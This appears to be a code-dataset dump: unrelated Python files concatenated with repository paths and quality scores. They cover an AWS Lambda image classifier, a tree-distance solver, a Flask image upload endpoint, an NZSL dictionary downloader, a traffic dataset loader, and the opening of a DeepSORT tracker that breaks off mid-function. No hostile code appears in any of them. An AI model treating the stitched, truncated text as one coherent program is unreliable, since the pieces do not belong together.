7, 4, 4, 1, 7, 7, 10, 10, 6, 9, 6, 6, 1, 6, 7, 1, 7, 1, 9, 3, 8, 10, 8,
10, 4, 2, 2, 5, 2, 6, 4, 9, 4, 9, 1, 8, 7, 1, 5, 8, 1, 1, 4, 10, 8, 10,
2, 8, 2, 6, 1, 10, 2, 5, 5, 2, 7, 7, 9, 4, 5, 10, 1, 5, 1, 9, 9, 1, 1,
7, 5, 5, 7, 10, 1, 10, 10, 7, 10, 1, 10, 10, 6, 2, 3, 3, 1, 10, 8, 8,
2, 3, 9, 10, 2, 2, 7, 7, 5, 10, 1, 7, 2, 6, 4, 4, 4, 4, 10, 10, 7, 5,
1, 8, 9, 7, 2, 1, 10, 9, 1, 9, 8, 4, 3, 8, 7, 2, 1, 9, 4, 2, 5, 4, 2,
5, 4, 6, 1, 1, 6, 5, 4, 10, 10, 4, 6, 4, 4, 5, 10, 2, 7, 6, 3, 6, 4, 2,
3, 6, 10, 4, 5, 7, 9, 8, 7, 1, 7, 9, 3, 3, 2, 4, 3, 7, 2, 6, 8, 9, 8,
7, 9, 9, 9, 9, 9, 7, 6, 1, 4, 5, 6, 5, 7, 1, 10, 1, 6, 9, 3, 2, 1, 4,
8, 10, 1, 1, 5, 7, 7, 4, 1, 3, 9, 5, 7, 9, 3, 7, 7, 1, 3, 7, 5, 1, 9,
3, 1, 2, 1, 9, 2, 4, 2, 4, 4, 7, 2, 1, 5, 8, 2, 9, 8, 2, 10, 1, 9, 6,
2, 6, 2, 8, 9, 5, 2, 4, 5, 2, 4, 1, 5, 10, 1, 3, 10, 9, 8, 2, 9, 4, 3,
9, 6, 5, 2, 1, 2, 4, 10, 2, 7, 2, 1, 4, 8, 7, 2, 8, 7, 6, 6, 8, 7, 8,
10, 8, 7, 5, 8, 9, 2, 9, 8, 5, 8, 4, 8, 3, 9, 5, 3, 6, 8, 1, 10, 10, 6,
9, 3, 7, 6, 8, 1, 8, 9, 7, 6, 6, 2, 1, 10, 7, 9, 7, 1, 9, 7, 2, 6, 10,
7, 6, 6, 1, 4, 6, 10, 4, 1, 9, 1, 8, 4, 2, 1, 9, 6, 1, 6, 9, 8, 1, 6,
1, 10, 10, 10, 8, 2, 3, 1, 6, 8, 8, 8, 5, 3, 5, 10, 6, 7, 3, 9, 9, 8,
2, 9, 3, 6, 8, 6, 1, 6, 1, 8, 2, 3, 7, 5, 7, 8, 1, 2, 3, 10, 10, 2, 3,
10, 4, 6, 7, 4, 2, 2, 2, 2, 4, 5, 5, 5, 1, 5, 7, 1, 1, 10, 6, 10, 9, 7,
4, 10, 1, 8, 8, 1, 1, 2, 2, 7, 6, 8, 3, 10, 10, 7, 6, 3, 5, 8, 9, 9, 6,
6, 3, 5, 9, 5, 7, 1, 2, 5, 7, 1, 2, 8, 2, 1, 8, 8, 7, 7, 8, 9, 9, 7, 2,
2, 4, 9, 5, 9, 7, 8, 6, 5, 7, 8, 2, 9, 6, 6, 3, 7, 3, 4, 8, 5, 10, 3,
1, 7, 10, 1, 8, 5, 9, 5, 9, 7, 3, 5, 2, 6, 2, 3, 6, 4, 3, 7, 6, 6, 5,
2, 2, 7, 9, 2, 10, 6, 8, 5, 1, 6, 8, 8, 3, 3, 9, 7, 6, 3, 10, 4, 2, 7,
10, 2, 3, 2, 7, 3, 5, 7, 2, 1, 8, 1, 4, 5, 9, 8, 2, 6, 3, 3, 4, 10, 7,
8, 5, 6, 2, 5, 9, 3, 1, 8, 1, 6, 1, 1, 7, 9, 1, 5, 2, 8, 3, 9, 1, 2, 9,
2, 4, 3, 4, 1, 4, 1, 2, 9, 1, 10, 7, 5, 8, 5, 10, 2, 2, 6, 3, 6, 7, 7,
6, 4, 5, 9, 5, 7, 8, 1, 9, 8, 6, 4, 1, 7, 5, 6, 7, 5, 4, 6, 8, 1, 8, 5,
5, 3, 1, 8, 9, 2, 1, 10, 2, 6, 9, 4, 3, 2, 9, 7, 2, 1, 5, 10, 2, 3, 8,
4, 8, 7, 9, 4, 8, 5, 7, 6, 6, 1, 10, 8, 3, 1, 3, 3, 9, 3, 4, 10, 3, 5,
7, 2, 8, 9, 8, 4, 6, 1, 4, 5, 8, 8, 10, 7, 2, 1, 7, 9, 9, 10, 3, 10, 5,
10, 7, 7, 8, 2, 9, 5, 4, 3, 8, 1, 3, 8, 8, 8, 5, 10, 7, 1, 6, 5, 10, 1,
1, 3, 4, 1, 6, 2, 10, 1, 8, 1, 5, 6, 9, 2, 10, 4, 6, 10, 8, 5, 3, 3, 9,
8, 5, 3, 1, 5, 4, 5, 4, 1, 3, 8, 1, 2, 9, 3, 2, 2, 8, 1, 2, 1, 10, 3,
3, 10
])
]
if __name__ == '__main__':
from utils import generate_csv
generate_csv(__file__, FIELDS, ROWS)
| 2.71875 | 3 |
matchvec/lambda_function.py | anisayari/matchvec | 1 | 12762236 | <reponame>anisayari/matchvec<filename>matchvec/lambda_function.py
from os import listdir, path, getenv
import json
import numpy as np
import cv2
import onnxruntime
from PIL import Image
import base64
from matchvec.process import predict_class, predict_objects
#from cgi import parse_header, parse_multipart
#from io import BytesIO
def lambda_handler(event, context):
print("ENV", getenv('BACKEND'))
print("ENV", getenv('DETECTION_THRESHOLD'))
print("LISTDIR", listdir('/tmp'))
res = list()
return {
'statusCode': 200,
'body': json.dumps(res)
}
def lambda_handler_classification(event, context):
print("ENV", getenv('BACKEND'))
print("ENV", getenv('DETECTION_THRESHOLD'))
print("LISTDIR", listdir('/tmp'))
res = list()
body_str = event.get('image', None)
#c_type, c_data = parse_header(event['headers']['Content-Type'])
#assert c_type == 'multipart/form-data'
#decoded_string = base64.b64decode(event['body'])
#form_data = parse_multipart(BytesIO(decoded_string), c_data)
if body_str:
print(type(body_str))
print(body_str[:100])
# read encoded image
imageString = base64.b64decode(body_str)
# convert binary data to numpy array
nparr = np.frombuffer(imageString, np.uint8)
# let opencv decode image to correct format
img = cv2.imdecode(nparr, cv2.IMREAD_ANYCOLOR)
res.append(predict_class(img))
return {
'statusCode': 200,
'body': json.dumps(res)
}
| 2.40625 | 2 |
src/data/902.py | NULLCT/LOMC | 0 | 12762237 | import sys
sys.setrecursionlimit(10000000)
class LowestCommonAncedtor:
def __init__(self, G, root):
self.n = len(G)
self.tour = [0] * (2 * self.n - 1)
self.depth_list = [0] * (2 * self.n - 1)
self.id = [0] * self.n
self.visit_id = 0
self.dfs(G, root, -1, 0)
self._rmq_init(self.depth_list)
def _rmq_init(self, arr):
n = len(arr)
self.N0 = 1 << (n - 1).bit_length()
self.dat = [self.n] * (self.N0 - 1) + arr + [self.n
] * (self.N0 - n + 1)
self.index = [0] * (self.N0 - 1) + list(
range(n)) + [0] * (self.N0 - n + 1)
dat = self.dat
index = self.index
for i in range(self.N0 - 2, -1, -1):
if dat[2 * i + 1] > dat[2 * i + 2]:
dat[i] = dat[2 * i + 2]
index[i] = index[2 * i + 2]
else:
dat[i] = dat[2 * i + 1]
index[i] = index[2 * i + 1]
def _rmq_query(self, l, r):
"""最小値となるindexを返す"""
l += self.N0
r += self.N0
s = self.n
dat = self.dat
index = self.index
while l < r:
if r & 1:
r -= 1
if s > dat[r - 1]:
s = dat[r - 1]
res = index[r - 1]
if l & 1:
if s > dat[l - 1]:
s = dat[l - 1]
res = index[l - 1]
l += 1
l >>= 1
r >>= 1
return res
def dfs(self, G, vertex, parent, depth):
self.id[vertex] = self.visit_id
self.tour[self.visit_id] = vertex
self.depth_list[self.visit_id] = depth
self.visit_id += 1
for element in G[vertex]:
if element != parent:
self.dfs(G, element, vertex, depth + 1)
self.tour[self.visit_id] = vertex
self.depth_list[self.visit_id] = depth
self.visit_id += 1
def get(self, u, v):
l, r = self.id[u], self.id[v]
if r < l:
l, r = r, l
q = self._rmq_query(l, r + 1)
return self.tour[q]
def dist(self, u, v):
"""点u,点vの距離"""
lca = self.get(u, v)
depth_u = self.depth_list[self.id[u]]
depth_v = self.depth_list[self.id[v]]
depth_lca = self.depth_list[self.id[lca]]
return depth_u + depth_v - 2 * depth_lca
#問.任意の2頂点の距離
n, q = map(int, input().split())
e = [[] for _ in range(n)]
for _ in range(n - 1):
a, b = map(int, input().split())
a -= 1
b -= 1
e[a].append(b)
e[b].append(a)
lca = LowestCommonAncedtor(e, 0)
for _ in range(q):
u, v = map(int, input().split())
u -= 1
v -= 1
if lca.dist(u, v) % 2 == 1:
print("Road")
else:
print("Town")
| 2.4375 | 2 |
demos/video_delete_all_rejected.py | Ziggeo/ZiggeoPythonSdk | 3 | 12762238 | <gh_stars>1-10
import sys
from Ziggeo import Ziggeo
if(len(sys.argv) < 3):
print ("Error\n")
print ("Usage: $>python video_delete_all_rejected.py YOUR_API_TOKEN YOUR_PRIVATE_KEY\n")
sys.exit()
api_token = sys.argv[1]
private_key = sys.argv[2]
ziggeo = Ziggeo(api_token, private_key)
def indexVideos(skip=0):
yey = 0
video_list = ziggeo.videos().index({"limit":100, "skip":skip,"approved":"REJECTED"})
for video in video_list:
delete_video_token = video["token"]
print ("deleting video "+delete_video_token)
ziggeo.videos().delete(delete_video_token)
if(len(video_list) > 0):
indexVideos(skip+100)
pass
indexVideos(0)
| 2.875 | 3 |
interp/helpers.py | SvenPVoigt/data-science-demos | 0 | 12762239 | import h5py
import numpy as np
def load_data(fname):
# load in an hdf5 file and return the X and y values
data_file = h5py.File(fname)
# load in X and y training data, fully into memory
X = data_file['X'][:].reshape(-1, 1) # each row is a data point
y = data_file['y'][:]
return X, y
def eval_fit(y_pred, y_true):
# compute mean absolute error
mae = np.mean(np.abs(y_pred - y_true))
return mae # don't normalize | 3.203125 | 3 |
scdlbot/__init__.py | ninja8bpyt/scdlbot | 0 | 12762240 | # -*- coding: utf-8 -*-
"""Top-level package for Music Downloader Telegram Bot."""
__author__ = """@Bots_Ki_Duniya"""
__reportbugs__ = "@Mr_Ninjas_Bot"
__version__ = "0.13.7"
| 1.015625 | 1 |
src/media/itunes.py | sffjunkie/media | 0 | 12762241 | <filename>src/media/itunes.py
# Copyright (c) 2009-2014 <NAME> <<EMAIL>>
import os
from plistlib import PlistParser
from mogul.media.itc import ITCHandler
class iTunesLibrary(object):
def __init__(self):
self.tracks = {}
def read(self, filename):
self.filename = filename
self._fp = open(filename)
self._parser = PlistParser()
root = self._parser.parse(self._fp)
return root
class iTunesArtworkDatabase(object):
def __init__(self, itunes_dir=''):
self.itunes_dir = itunes_dir
def exists(self, library_id, persistent_id):
paths = self.itc_paths(library_id, persistent_id)
if os.path.exists(paths[0]) or os.path.exists(paths[1]):
return True
else:
return False
def get_image(self, library_id, persistent_id, size=128):
itc_file = ITCHandler()
paths = self.itc_paths(library_id, persistent_id)
try:
itc_file.read(paths[0])
except:
itc_file.read(paths[1])
found = None
for image in itc_file.images:
# If within 5%
if size < (image.width + (image.width/20)) or size > (image.width - (image.width/20)) \
or size < (image.height + (image.height/20)) or size > (image.height - (image.height/20)):
found = image
break
if found is not None:
return found
else:
raise IndexError('Image with width %d not found in ITC file')
def itc_paths(self, library_id, persistent_id):
path = ''
for ch in persistent_id[::-1][:3]:
path = os.path.join(path, '%02d' % int(ch, 16))
paths = [
os.path.join(self.itunes_dir, 'Cache', library_id, path, '%s-%s.itc' % (library_id, persistent_id)),
os.path.join(self.itunes_dir, 'Download', library_id, path, '%s-%s.itc' % (library_id, persistent_id))
]
return paths
| 2.703125 | 3 |
cusg/blueprints/files.py | bigSAS/critical-usg-backend | 0 | 12762242 | <filename>cusg/blueprints/files.py
import os, pathlib
import uuid
from flask import Blueprint, request, send_from_directory
from werkzeug.utils import secure_filename
from cusg.utils.http import ok_response, ValidationError
from cusg.utils.permissions import restricted
files_blueprint = Blueprint('files', __name__)
ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif']
UPLOAD_FOLDER = str(pathlib.Path(__file__).parent.absolute()).replace('\\', '/') + '/../files'
print('FILES UPLOAD FOLDER', UPLOAD_FOLDER)
@files_blueprint.route('/add', methods=('POST',))
@restricted(['ADMIN'])
def add_file():
""" upload file """
file = request.files.get('file', None)
if not file: raise ValidationError('file is missing', 'file')
filename, ext = tuple(file.filename.rsplit('.', 1))
if ext.lower().strip() not in ALLOWED_EXTENSIONS:
raise ValidationError('invalid file extension', 'file')
filename += f'{str(uuid.uuid4())[:7].replace("-", "")}.{ext}'
filename = secure_filename(filename)
file.save(os.path.join(UPLOAD_FOLDER, filename))
return ok_response({'uploaded_filename': filename})
| 2.40625 | 2 |
tests/test_fitting_distance_on_text_collections.py | edepanaf/natural-language-processing | 0 | 12762243 | <gh_stars>0
import unittest
from fitting_distance_on_text_collections import *
from oracle_claim import OracleClaim
class TestFittingDistanceOnTextCollections(unittest.TestCase):
def test_fit_of_fitting_distance_on_text_collections(self):
text0 = 'banana'
text1 = 'ananas'
text2 = 'bans'
text_collection = {text0, text1, text2}
distance = FittingDistanceOnTextCollections(text_collection)
oracle_claim = OracleClaim(({text1}, {text2}), (0.1, 0.2))
old_distance12 = distance({text1}, {text2})
distance.fit({oracle_claim})
new_distance12 = distance({text1}, {text2})
self.assertTrue(old_distance12 > new_distance12)
def test_distance_on_text_collections(self):
text0 = 'banana'
text1 = 'ananas'
text2 = 'bans'
text_collection = {text0, text1, text2}
distance = FittingDistanceOnTextCollections(text_collection)
self.assertTrue(isinstance(distance({text0, text1}, {text1, text2}), float))
def test_type_bag_of_factors_from_text(self):
bag = bag_of_factors_from_text('wefwef')
self.assertTrue(isinstance(bag, tuple))
def test_bag_of_factors_from_text(self):
text = 'ab c ab '
bag = bag_of_factors_from_text(text, max_factor_length=3)
expected = {'a': 2, 'ab': 2, 'ab ': 2, 'b': 2, 'b ': 2, 'b c': 1, ' ': 4, ' c': 1,
' c ': 1, 'c': 1, 'c ': 1, 'c ': 1, ' ': 1, ' a': 1, ' a': 1, ' ab': 1}
computed = dict()
for factor in bag:
computed[factor] = computed.get(factor, 0) + 1
self.assertEqual(computed, expected)
def test_clean_text(self):
text = 'A;b_C'
clean = 'a b c'
self.assertEqual(clean_text(text), clean)
def test_clean_letter(self):
self.assertEqual(clean_letter('a'), 'a')
self.assertEqual(clean_letter(','), ' ')
def test_non_existent_weight_from_factor(self):
text0 = 'banana'
text1 = 'ananas'
text2 = 'bans'
text_collection = {text0, text1, text2}
distance = FittingDistanceOnTextCollections(text_collection)
self.assertEqual(distance.weight_from_factor('wef'), 0.)
def test_input_bag_dictionary(self):
bag_to_weight = {'aa': 1., 'ab': 2., 'abc': 3.}
distance = FittingDistanceOnTextCollections(bag_to_weight)
self.assertEqual(distance.weight_from_text('aa'), 1.)
self.assertEqual(distance.weight_from_text('ab'), 2.)
self.assertEqual(distance.weight_from_text('abc'), 3.)
def test_input_factor_dictionary(self):
text0 = 'banana'
text1 = 'ananas'
text2 = 'bans'
text_collection = {text0, text1, text2}
factor_to_weight = {'a': 1., 'b': 2., 'ba': 3., 'c': 28.}
distance = FittingDistanceOnTextCollections(text_collection, factor_to_weight=factor_to_weight)
self.assertEqual(distance.weight_from_factor('a'), 1.)
self.assertEqual(distance.weight_from_factor('ba'), 3.)
self.assertEqual(distance.weight_from_factor('d'), 0.)
self.assertEqual(distance.weight_from_factor('c'), 0.)
if __name__ == '__main__':
unittest.main()
| 2.5625 | 3 |
freelex.py | ackama/nzsl-dictionary-scripts | 2 | 12762244 | import sys
import os
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
import shutil
import sqlite3
def fetch_database(filename):
r = urllib.request.urlopen('https://nzsl-assets.vuw.ac.nz/dnzsl/freelex/publicsearch?xmldump=1')
with open(filename, "wb") as f:
f.write(r.read())
def fetch_assets(root):
for entry in root.iter("entry"):
print(entry.find("headword").text)
for asset in entry.find("ASSET"):
if ("picture" == asset.tag):
fn = os.path.join(asset.tag, asset.text)
if not os.path.exists(fn):
try:
os.makedirs(os.path.dirname(fn))
except IOError:
pass
r = urllib.request.urlopen("https://nzsl-assets.vuw.ac.nz/dnzsl/freelex/assets/" + urllib.parse.quote(asset.text))
with open(fn, "wb") as f:
f.write(r.read())
# Modify filenames to match the Android requirements (lowercase a-z and _ only)
# Since iOS uses the same data source (the .dat file), update iOS to use the same image names.
def normalize_image_filename(filename):
normalized_filename = filename.replace('-', '_').lower()
num_of_periods = normalized_filename.count('.')
if (num_of_periods > 1):
normalized_filename = normalized_filename.replace('.', '_', num_of_periods - 1)
return normalized_filename
def rename_assets(root):
for entry in root.iter("entry"):
for asset in entry.find("ASSET"):
if ("picture" == asset.tag):
old_filename = os.path.join(asset.tag, asset.text)
if not os.path.isfile(old_filename):
print("Picture {} does not exist!", old_filename)
continue
new_filename = normalize_image_filename(old_filename)
os.rename(old_filename, new_filename)
asset.text = new_filename.replace('picture/', '', 1)
def write_datfile(root):
with open("nzsl.dat", "w") as f:
for entry in root.iter("entry"):
headword = entry.attrib["id"], entry.find("headword").text
sec = entry.find("glosssecondary")
maori = entry.find("glossmaori")
picture = entry.find("ASSET/picture")
video = entry.find("ASSET/glossmain")
handshape = entry.find("handshape")
if picture is None:
print("{} missing picture".format(headword))
if video is None:
print("{} missing video".format(headword))
if handshape is None:
print("{} missing handshape".format(headword))
print("\t".join([
entry.find("glossmain").text,
sec.text if sec is not None else "",
maori.text if maori is not None else "",
os.path.basename(normalize_image_filename(picture.text)) if picture is not None else "",
"https://nzsl-assets.vuw.ac.nz/dnzsl/freelex/assets/"+video.text.replace(".webm", ".mp4") if video is not None else "",
handshape.text if handshape is not None else "",
entry.find("location").text,
]), file=f)
def write_sqlitefile():
if os.path.exists("nzsl.db"):
os.unlink("nzsl.db")
db = sqlite3.connect("nzsl.db")
db.execute("create table words (gloss, minor, maori, picture, video, handshape, location, target)")
with open("nzsl.dat") as f:
for s in f:
a = s.strip().split("\t")
a.append("{}|{}|{}".format(normalise(a[0]), normalise(a[1]), normalise(a[2])))
assert all(32 <= ord(x) < 127 for x in a[-1]), a[-1]
db.execute("insert into words values (?, ?, ?, ?, ?, ?, ?, ?)", a)
db.commit()
db.close()
def copy_images_to_one_folder():
if (os.path.isdir("assets")):
shutil.rmtree("assets")
os.makedirs("assets")
os.system("cp picture/*/*.png assets/ 2>/dev/null")
# Helper functions
def normalise(s):
return (s.lower()
.replace("ā", "a")
.replace("ē", "e")
.replace("é", "e")
.replace("ī", "i")
.replace("ō", "o")
.replace("ū", "u"))
| 2.875 | 3 |
SecondMost.py | KanagaSubramanian/PythonPrograms-frequent-Character- | 0 | 12762245 | inputstr="SecondMostFrequentCharacterInTheString"
safe=inputstr
countar=[]
count=0
for i in inputstr:
if(i!='#'):
countar.append(inputstr.count(i))
print(i,inputstr.count(i),end=", ")
inputstr=inputstr.replace(i,'#')
else:
continue
firstmax=max(countar)
countar.remove(max(countar))
maxnum=max(countar)
print()
if(firstmax==maxnum):
for i in safe:
if(maxnum==safe.count(i)):
count+=1
if(count==2):
print(i,maxnum)
break
else:
for i in safe:
if(maxnum==safe.count(i)):
print(i,maxnum)
break
| 3.4375 | 3 |
setup.py | 2020ai/tweetDetective_DataScience | 0 | 12762246 | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='tweet analyzer',
author='<NAME>',
license='',
)
| 1.0625 | 1 |
libcity/data/dataset/cstn_dataset.py | moghadas76/test_bigcity | 221 | 12762247 | <reponame>moghadas76/test_bigcity
import os
import numpy as np
from libcity.data.dataset import TrafficStateGridOdDataset
from libcity.data.utils import generate_dataloader
from libcity.utils import ensure_dir
class CSTNDataset(TrafficStateGridOdDataset):
def __init__(self, config):
super().__init__(config)
self.feature_name = {'X': 'float', 'W': 'float', 'y': 'float'}
def _generate_ext_data(self, ext_data):
num_samples = ext_data.shape[0]
offsets = np.sort(np.concatenate((np.arange(-self.input_window - self.output_window + 1, 1, 1),)))
min_t = abs(min(offsets))
max_t = abs(num_samples - abs(max(offsets)))
W = []
for t in range(min_t, max_t):
W_t = ext_data[t + offsets, ...]
W.append(W_t)
W = np.stack(W, axis=0)
return W
def _generate_data(self):
"""
加载数据文件(.gridod)和外部数据(.ext),以X, W, y的形式返回
Returns:
tuple: tuple contains:
X(np.ndarray): 模型输入数据,(num_samples, input_length, ..., feature_dim) \n
W(np.ndarray): 模型外部数据,(num_samples, input_length, ext_dim)
y(np.ndarray): 模型输出数据,(num_samples, output_length, ..., feature_dim)
"""
# 处理多数据文件问题
if isinstance(self.data_files, list):
data_files = self.data_files.copy()
else:
data_files = [self.data_files].copy()
# 加载外部数据
ext_data = self._load_ext() # (len_time, ext_dim)
W = self._generate_ext_data(ext_data)
# 加载基本特征数据
X_list, y_list = [], []
for filename in data_files:
df = self._load_dyna(filename) # (len_time, ..., feature_dim)
X, y = self._generate_input_data(df)
# x: (num_samples, input_length, input_dim)
# y: (num_samples, output_length, ..., output_dim)
X_list.append(X)
y_list.append(y)
X = np.concatenate(X_list)
y = np.concatenate(y_list)
df = self._load_dyna(data_files[0]).squeeze()
self._logger.info("Dataset created")
self._logger.info("X shape: {}, W shape: {}, y shape: ".format(str(X.shape), str(W.shape), y.shape))
return X, W, y
def _split_train_val_test(self, X, W, y):
test_rate = 1 - self.train_rate - self.eval_rate
num_samples = X.shape[0]
num_test = round(num_samples * test_rate)
num_train = round(num_samples * self.train_rate)
num_eval = num_samples - num_test - num_train
# train
x_train, w_train, y_train = X[:num_train], W[:num_train], y[:num_train]
# eval
x_eval, w_eval, y_eval = X[num_train: num_train + num_eval], \
W[num_train: num_train + num_eval], y[num_train: num_train + num_eval]
# test
x_test, w_test, y_test = X[-num_test:], W[-num_test:], y[-num_test:]
# log
self._logger.info(
"train\tX: {}, W: {}, y: {}".format(str(x_train.shape), str(w_train.shape), str(y_train.shape)))
self._logger.info("eval\tX: {}, W: {}, y: {}".format(str(x_eval.shape), str(w_eval.shape), str(y_eval.shape)))
self._logger.info("test\tX: {}, W: {}, y: {}".format(str(x_test.shape), str(w_test.shape), str(y_test.shape)))
return x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test
def _load_cache_train_val_test(self):
self._logger.info('Loading ' + self.cache_file_name)
cat_data = np.load(self.cache_file_name)
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = \
cat_data['x_train'], cat_data['w_train'], cat_data['y_train'], cat_data['x_eval'], cat_data['w_eval'], \
cat_data['y_eval'], cat_data['x_test'], cat_data['w_test'], cat_data['y_test']
self._logger.info(
"train\tX: {}, W: {}, y: {}".format(str(x_train.shape), str(w_train.shape), str(y_train.shape)))
self._logger.info("eval\tX: {}, W: {}, y: {}".format(str(x_eval.shape), str(w_eval.shape), str(y_eval.shape)))
self._logger.info("test\tX: {}, W: {}, y: {}".format(str(x_test.shape), str(w_test.shape), str(y_test.shape)))
return x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test
def _generate_train_val_test(self):
X, W, y = self._generate_data()
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = self._split_train_val_test(X, W, y)
if self.cache_dataset:
ensure_dir(self.cache_file_folder)
np.savez_compressed(
self.cache_file_name,
x_train=x_train,
w_train=w_train,
y_train=y_train,
x_test=x_test,
w_test=w_test,
y_test=y_test,
x_eval=x_eval,
w_eval=w_eval,
y_eval=y_eval,
)
self._logger.info('Saved at ' + self.cache_file_name)
return x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test
def get_data(self):
# 加载数据集
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = [], [], [], [], [], [], [], [], []
if self.data is None:
if self.cache_dataset and os.path.exists(self.cache_file_name):
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = self._load_cache_train_val_test()
else:
x_train, w_train, y_train, x_eval, w_eval, y_eval, x_test, w_test, y_test = self._generate_train_val_test()
# 数据归一化
self.feature_dim = x_train.shape[-1]
self.ext_dim = w_train.shape[-1]
self.scaler = self._get_scalar(self.scaler_type, x_train, y_train)
x_train[..., :self.output_dim] = self.scaler.transform(x_train[..., :self.output_dim])
w_train[..., :self.output_dim] = self.scaler.transform(w_train[..., :self.output_dim])
y_train[..., :self.output_dim] = self.scaler.transform(y_train[..., :self.output_dim])
x_eval[..., :self.output_dim] = self.scaler.transform(x_eval[..., :self.output_dim])
w_eval[..., :self.output_dim] = self.scaler.transform(w_eval[..., :self.output_dim])
y_eval[..., :self.output_dim] = self.scaler.transform(y_eval[..., :self.output_dim])
x_test[..., :self.output_dim] = self.scaler.transform(x_test[..., :self.output_dim])
w_test[..., :self.output_dim] = self.scaler.transform(w_test[..., :self.output_dim])
y_test[..., :self.output_dim] = self.scaler.transform(y_test[..., :self.output_dim])
train_data = list(zip(x_train, w_train, y_train))
eval_data = list(zip(x_eval, w_eval, y_eval))
test_data = list(zip(x_test, w_test, y_test))
# 转Dataloader
self.train_dataloader, self.eval_dataloader, self.test_dataloader = \
generate_dataloader(train_data, eval_data, test_data, self.feature_name,
self.batch_size, self.num_workers, pad_with_last_sample=self.pad_with_last_sample)
self.num_batches = len(self.train_dataloader)
return self.train_dataloader, self.eval_dataloader, self.test_dataloader
def get_data_feature(self):
"""
返回数据集特征,scaler是归一化方法,adj_mx是邻接矩阵,num_nodes是网格的个数,
len_row是网格的行数,len_column是网格的列数,
feature_dim是输入数据的维度,output_dim是模型输出的维度
Returns:
dict: 包含数据集的相关特征的字典
"""
return {"scaler": self.scaler,
"num_nodes": self.num_nodes, "feature_dim": self.feature_dim, "ext_dim": self.ext_dim,
"output_dim": self.output_dim, "len_row": self.len_row, "len_column": self.len_column,
"num_batches": self.num_batches}
| 2.421875 | 2 |
deep_sort_realtime/deepsort_tracker.py | dhalnon/deep_sort_realtime | 0 | 12762248 | import time
import logging
import cv2
import numpy as np
from deep_sort_realtime.deep_sort import nn_matching
from deep_sort_realtime.deep_sort.detection import Detection
from deep_sort_realtime.deep_sort.tracker import Tracker
from deep_sort_realtime.utils.nms import non_max_suppression
log_level = logging.DEBUG
default_logger = logging.getLogger('DeepSORT')
default_logger.setLevel(log_level)
handler = logging.StreamHandler()
handler.setLevel(log_level)
formatter = logging.Formatter('[%(levelname)s] [%(name)s] %(message)s')
handler.setFormatter(formatter)
default_logger.addHandler(handler)
class DeepSort(object):
def __init__(self, max_age = 30, nms_max_overlap=1.0, max_cosine_distance=0.2, nn_budget=None, override_track_class=None, clock=None, embedder=True, half=True, bgr=True, logger=None, polygon=False):
'''
Parameters
----------
max_age : Optional[int] = 30
Maximum number of missed misses before a track is deleted.
nms_max_overlap : Optional[float] = 1.0
Non-maxima suppression threshold: Maximum detection overlap, if is 1.0, nms will be disabled
max_cosine_distance : Optional[float] = 0.2
Gating threshold for cosine distance
nn_budget : Optional[int] = None
Maximum size of the appearance descriptors, if None, no budget is enforced
override_track_class : Optional[object] = None
Giving this will override default Track class, this must inherit Track
clock : Optional[object] = None
Clock custom object provides date for track naming and facilitates track id reset every day, preventing overflow and overly large track ids. For example clock class, please see `utils/clock.py`
embedder : Optional[bool] = True
Whether to use in-built embedder or not. If False, then embeddings must be given during update
half : Optional[bool] = True
Whether to use half precision for deep embedder
bgr : Optional[bool] = True
Whether frame given to embedder is expected to be BGR or not (RGB)
logger : Optional[object] = None
logger object
polygon: Optional[bool] = False
Whether detections are polygons (e.g. oriented bounding boxes)
'''
if logger is None:
self.logger = default_logger
else:
self.logger = logger
# self.video_info = video_info
# assert clock is not None
self.nms_max_overlap = nms_max_overlap
metric = nn_matching.NearestNeighborDistanceMetric(
"cosine", max_cosine_distance, nn_budget)
self.tracker = Tracker(metric, max_age = max_age, override_track_class=override_track_class, clock=clock, logger=self.logger)
if embedder:
from deep_sort_realtime.embedder.embedder_pytorch import MobileNetv2_Embedder as Embedder
self.embedder = Embedder(half=half, max_batch_size=16, bgr=bgr)
else:
self.embedder = None
self.polygon = polygon
self.logger.info('DeepSort Tracker initialised')
self.logger.info(f'- max age: {max_age}')
self.logger.info(f'- appearance threshold: {max_cosine_distance}')
self.logger.info(f'- nms threshold: {"OFF" if self.nms_max_overlap==1.0 else self.nms_max_overlap }')
self.logger.info(f'- max num of appearance features: {nn_budget}')
self.logger.info(f'- overriding track class : {"No" if override_track_class is None else "Yes"}' )
self.logger.info(f'- clock : {"No" if clock is None else "Yes"}' )
self.logger.info(f'- in-build embedder : {"No" if self.embedder is None else "Yes"}' )
self.logger.info(f'- polygon detections : {"No" if polygon is False else "Yes"}' )
def update_tracks(self, raw_detections, embeds=None, frame=None):
"""Run multi-target tracker on a particular sequence.
Parameters
----------
raw_detections (horizontal bb) : List[ Tuple[ List[float or int], float, str ] ]
List of detections, each in tuples of ( [left,top,w,h] , confidence, detection_class)
raw_detections (polygon) : List[ List[float], List[int or str], List[float] ]
List of Polygons, Classes, Confidences. All 3 sublists of the same length. A polygon defined as a ndarray-like [x1,y1,x2,y2,...].
embeds : Optional[ List[] ] = None
List of appearance features corresponding to detections
frame : Optional [ np.ndarray ] = None
if embeds not given, Image frame must be given here, in [H,W,C].
Returns
-------
list of track objects (Look into track.py for more info or see "main" section below in this script to see simple example)
"""
if embeds is None:
if self.embedder is None:
raise Exception('Embedder not created during init so embeddings must be given now!')
if frame is None:
raise Exception('either embeddings or frame must be given!')
if not self.polygon:
raw_detections = [ d for d in raw_detections if d[0][2] > 0 and d[0][3] > 0]
if embeds is None:
embeds = self.generate_embeds(frame, raw_detections)
# Proper deep sort detection objects that consist of bbox, confidence and embedding.
detections = self.create_detections(raw_detections, embeds)
else:
polygons, bounding_rects = self.process_polygons(raw_detections[0])
if embeds is None:
embeds = self.generate_embeds_poly(frame, polygons, bounding_rects)
# Proper deep sort detection objects that consist of bbox, confidence and embedding.
detections = self.create_detections_poly(raw_detections, embeds, bounding_rects)
# Run non-maxima suppression.
boxes = np.array([d.ltwh for d in detections])
